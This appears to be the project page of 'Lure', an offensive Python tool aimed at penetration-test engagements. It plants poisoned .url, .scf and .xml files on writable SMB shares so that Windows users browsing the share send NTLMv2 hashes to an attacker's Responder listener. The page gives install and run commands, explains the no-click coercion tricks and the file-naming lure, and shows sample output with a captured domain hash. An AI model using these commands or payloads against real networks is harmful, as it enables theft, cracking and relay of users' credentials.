Drops poisoned .url, .scf, and .xml payloads onto writable SMB shares. The first user to browse coerces NTLM authentication back to your Responder listener.
$ sudo lure drop -t 10.10.10.5 -c 10.10.14.3 -i tun0 -s public [+] Wrote @lure.url [+] Wrote @lure.scf [+] Wrote @lure.xml [*] Uploading 3 payload(s) at //10.10.10.5/public [*] Starting Responder on tun0 [SMB] NTLMv2-SSP Hash : CORP\jdoe::CORP:…
Each payload abuses a different Windows auto-resolve behavior. The @ prefix sorts files to the top of the directory listing, maximizing the chance a curious user browses them first.
lure drop generates the payloads, uses smbclient to upload them (anonymous, authenticated, or into a nested subdirectory), then hands off to Responder on your chosen interface. Add --no-listen to drop only, or use lure listen -i IFACE separately.
Internet shortcut with an IconFile UNC path. Windows Explorer resolves the icon the moment the share is browsed — no click required.
Shell command link that also forces icon resolution via UNC. Old-school trick that still fires on modern Windows when Explorer previews the directory.
Word document with an xml-stylesheet processing instruction pointing at a remote XSL over UNC. Fires when a user opens the doc.
When the share root is read-only but a subdirectory is writable, -d <path> uploads the payload directly into the nested location without requiring a separate mount or CWD change.
-u accepts user, DOMAIN/user, DOMAIN\user, or user@DOMAIN.LOCAL. Passwords resolve from --pass, $LURE_PASSWORD, or --ask-pass.
Single-file Python tool. Wraps smbclient for upload and responder for capture. Runs on any Kali-style attacker workstation.
Lure chains four stages behind a single command. Every stage is a thin wrapper around tools already on your Kali box.
Writes a .url, .scf, or .xml template with your callback IP embedded in the UNC path. The @ filename prefix sorts the file to the top of directory listings; --name overrides for telemetry-aware engagements.
Wraps smbclient with anonymous, authenticated, and nested upload modes via a single subprocess.run argv list — no shell, no injection surface. Multiple payloads land in one session.
When a user browses the share, Explorer resolves the UNC icon reference or opens the Word document. Windows auto-authenticates to the attacker IP using the user's NTLM credentials.
Lure shells out to sudo responder -I <iface> -wv on the interface you provide. Skip with --no-listen or invoke lure listen -i IFACE separately. Inbound NTLMv2 hashes land in Responder's log for offline cracking or relay.
Python package installable via pipx or pip. Requires smbclient and responder on $PATH — both ship with Kali.
# Install with pipx (recommended) $ pipx install git+https://github.com/Real-Fruit-Snacks/Lure.git # Or standard pip $ pip install git+https://github.com/Real-Fruit-Snacks/Lure.git # System dependencies (Kali) $ sudo apt install smbclient responder # Verify install $ lure --help
# Drop a .scf on an open share $ sudo lure drop -t TARGET -c CALLBACK -i IFACE -s SHARE -p scf # Authenticated upload to a domain share $ sudo lure drop -t TARGET -c CALLBACK -i IFACE -s SHARE \ -u DOMAIN/USER --ask-pass # Drop all three (default) into a nested subdirectory $ sudo lure drop -t TARGET -c CALLBACK -i IFACE -s SHARE \ -d path/to/dir # Clean up after the engagement $ sudo lure clean -t TARGET -s SHARE